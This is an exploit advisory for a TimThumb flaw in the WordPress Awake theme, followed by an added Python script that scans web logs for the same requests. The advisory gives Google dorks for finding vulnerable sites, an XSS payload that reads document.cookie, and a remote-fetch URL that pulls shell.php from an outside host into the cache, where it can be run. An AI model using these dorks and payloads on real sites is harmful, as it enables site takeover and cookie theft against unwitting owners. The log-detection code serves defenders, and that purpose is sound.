WordPress Themes Awake - Cross-Site Scripting

Published: 2017.06.13
Credit: x0id
Risk: Low
CWE: N/A
CVE: N/A
Local: No
Remote: Yes

# Exploit Title: WordPress Themes Awake - Cross-Site Scripting
# Author: x0id
# Date: 13 June 2017
# Tested on: Windows 7

1) Locate targets with Google dorking.
inurl:/wp-content/themes/awake
Index of /wp-content/themes/awake/

2) Exploit the websites.
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php
Vulnerable TimThumb versions: 1.14 / 1.19

3) Proof of concept (PoC)
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/big_file&h=1&w=1
https://localhost/wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/shell.php

4) Access the resulting files in the cache directory.
https://localhost/wp-content/themes/awake/lib/scripts/cache/your-file.php
https://localhost/wp-content/themes/awake/lib/scripts/cache/1234567890.jpg
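Detection logic for the request patterns in steps 3 and 4, as an added example that is not part of the advisory: it scans web-server access-log lines (constructed samples below) for thumb.php requests whose src parameter carries HTML tags or points at an external host, and for PHP files being served out of the TimThumb cache directory. The allowed-host list and image-extension set are assumptions.

```python
import re
from urllib.parse import urlparse, parse_qs, unquote

# Combined-log-format line: ip ident user [time] "METHOD target PROTO" status size
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}   # assumption: what thumb.php should ever load
LOCAL_HOSTS = {"localhost"}                     # assumption: the only host it may fetch from

# Constructed sample log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [13/Jun/2017:10:00:01 +0000] "GET /wp-content/themes/awake/lib/scripts/thumb.php?src=wp-content/uploads/photo.jpg&w=100 HTTP/1.1" 200 5120
203.0.113.9 - - [13/Jun/2017:10:00:02 +0000] "GET /wp-content/themes/awake/lib/scripts/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg HTTP/1.1" 200 310
203.0.113.9 - - [13/Jun/2017:10:00:03 +0000] "GET /wp-content/themes/awake/lib/scripts/thumb.php?src=http://www.example.com/shell.php HTTP/1.1" 200 210
203.0.113.7 - - [13/Jun/2017:10:00:04 +0000] "GET /wp-content/themes/awake/lib/scripts/cache/1234567890.php HTTP/1.1" 200 44
203.0.113.2 - - [13/Jun/2017:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 9000
"""

def classify_thumb_src(src):
    """Return the reasons a thumb.php src value looks hostile (empty list if benign)."""
    reasons = []
    decoded = unquote(src)                      # decode once more to catch double-encoded input
    if "<" in decoded or ">" in decoded:
        reasons.append("html_in_src")           # markup that TimThumb reflects into its error page
    parsed = urlparse(decoded)
    if parsed.scheme in ("http", "https") and parsed.hostname not in LOCAL_HOSTS:
        reasons.append("remote_fetch")          # script asked to pull a file from another host
    ext = re.search(r"\.[A-Za-z0-9]+$", parsed.path)
    if ext is None or ext.group(0).lower() not in IMAGE_EXT:
        reasons.append("non_image_src")         # not an image at all (e.g. .php, or no extension)
    return reasons

def analyze_log(text):
    """Return (ip, path, reasons) for every suspicious TimThumb-related request."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        target = urlparse(m.group("target"))
        path = target.path.lower()
        reasons = []
        if path.endswith("/thumb.php") or path.endswith("/timthumb.php"):
            src = parse_qs(target.query).get("src", [""])[0]
            reasons = classify_thumb_src(src)
        elif "/lib/scripts/cache/" in path and path.endswith(".php"):
            reasons = ["php_in_cache"]          # executable where only cached images belong
        if reasons:
            findings.append((m.group("ip"), target.path, reasons))
    return findings

if __name__ == "__main__":
    for ip, path, reasons in analyze_log(SAMPLE_LOG):
        print(ip, path, ",".join(reasons))
```

Requests matching `remote_fetch` or `php_in_cache` with a 200 status are the ones worth checking against the cache directory on disk.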

Indonesian h4x0r.


Copyright 2017, cxsecurity.com